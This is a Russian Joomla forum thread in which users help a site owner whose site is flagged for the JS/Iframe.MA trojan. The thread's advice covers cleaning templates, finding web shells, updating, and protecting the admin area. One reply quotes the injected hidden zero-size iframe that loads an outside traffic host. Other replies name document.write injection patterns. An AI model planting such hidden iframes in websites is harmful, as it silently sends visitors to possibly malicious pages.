Угроза: JS/Iframe.MA троянская программа

  • 15 Ответов
  • 1404 Просмотров

0 Пользователей и 1 Гость просматривают эту тему.

*

Оффлайн krizis

Здраствуйте, недели две назат столкнулся с такой проблемой сайт стал выдавать вирус "Угроза: JS/Iframe.MA троянская программа" антивирус eset smart "
кто подскажет как исправить проблемку эту, это у меня или на хосте-домене, сайт ссылка вырезана


« Последнее редактирование: 02.10.2015, 23:43:10 от era »


*

Оффлайн krizis

Joomla 3,4,4, не чего не устанавливал, как исправить кто знает ?

*

Оффлайн draff

  • *******
  • 2819
  • [+]174 / [-]5
  • Пол: Мужской
  • step by step
    • Просмотр профиля
А шаблон включить стандартный пробовал?

*

Оффлайн winstrool

  • ******
  • 802
  • [+]41 / [-]2
  • Пол: Мужской
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
У вас фреймов в топе этих накидано хоть жоп...ой жуй, взломали однозначно! сливают трафик возможно на связку сплоитов.

Цитировать
<iframe width="0" height="0" src="http://c11n4.i.teaserguide.com/snitch?default_keyword=%D0%91%D0%B8%D0%B1%D0%BB%D0%B8%D0%BE%D1%82%D0%B5%D0%BA%D0%B8%20%D0%9D%D0%B5%D1%81%D1%82%D0%B5%D1%80%D0%BE%D0%B2%D1%81%D0%BA%D0%BE%D0%B3%D0%BE%20%D1%80%D0%B0%D0%B9%D0%BE%D0%BD%D0%B0&amp;referrer=&amp;se_referrer=&amp;source=bibliosistema.ru"></iframe>

P.S: Стоит уязвимый компонент com_joomlaupdate, админка не прикрыта бейсик авторизацией
« Последнее редактирование: 01.10.2015, 13:28:18 от winstrool »
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

Оффлайн krizis

а где фрейм прописывается кто подскажет не могу накопать

*

Оффлайн draff

  • *******
  • 2819
  • [+]174 / [-]5
  • Пол: Мужской
  • step by step
    • Просмотр профиля
в яваскриптах.document.write('<iframe или document.write("<scr"+"ipt

*

Онлайн voland

  • ********
  • 9939
  • [+]520 / [-]101
  • Пол: Мужской
  • СКАЙП утерян! Пишите в телеграм @volandku
    • Просмотр профиля
    • webstudio.pro
Joomla 3,4,4, не чего не устанавливал, как исправить кто знает ?
Зачем так нагло врать?

Тут куча гадости стоит, сами же наставили вирусов, еще и ссылка на эту гадость!

*

Оффлайн krizis

я не вру, я только учусь. Простите если что не так

*

Оффлайн flyingspook

Joomla 3,4,4, не чего не устанавливал, как исправить кто знает ?
Так отвечайте на вопросы коректно, ни чего не ставили это означает что взяли пакет движка с Joomla.org и больше ни чего кроме него не ставили максимум языковой пакет, а у вас как у любого новичка/ученика помойка всего и вы считаете что ни чего больше не устанавливали.
В вашем случае или к специалистам обращаться или долго и упорно обучаться.

*

Оффлайн krizis

Re: Угроза: JS/Iframe.MA троянская программа
« Ответ #10 : 03.10.2015, 13:54:55 »
спасибо за комплимент

*

Оффлайн dr.red

Re: Угроза: JS/Iframe.MA троянская программа
« Ответ #11 : 03.10.2015, 17:51:45 »
В тот-же день так-же сломали сайт и теперь выдает туже ошибку. но я не вижу чтобы что-то было подключено. http://exaltacleaning.ru/

*

Оффлайн winstrool

  • ******
  • 802
  • [+]41 / [-]2
  • Пол: Мужской
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
Re: Угроза: JS/Iframe.MA троянская программа
« Ответ #12 : 03.10.2015, 18:55:43 »
В тот-же день так-же сломали сайт и теперь выдает туже ошибку. но я не вижу чтобы что-то было подключено. http://exaltacleaning.ru/
У вас под тегом <BODY> прописан js/frame убрать его можно с шаблона, ну и сразу же ищите шелы!
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

Оффлайн dr.red

Re: Угроза: JS/Iframe.MA троянская программа
« Ответ #13 : 28.11.2016, 05:08:39 »
Для того чтобы не было частых взломов рекомендуется обновлять движок до последней версии. Также при каждой установке нового дополнения проверить нету ли где-то нового JS.

*

Оффлайн dialit

Re: Угроза: JS/Iframe.MA троянская программа
« Ответ #14 : 28.11.2016, 10:53:02 »
Цитата: winstrool
P.S: Стоит уязвимый компонент com_joomlaupdate, админка не прикрыта бейсик авторизацией
скажите, что значит бейсик авторизация?

*

Оффлайн flyingspook

Re: Угроза: JS/Iframe.MA троянская программа
« Ответ #15 : 28.11.2016, 14:35:21 »
скажите, что значит бейсик авторизация?
то же самое что и Базовая HTTP-авторизация Basic Authorization
выставить можно из панели хостинга выбрав папку и назначив на неё ограничение с паролем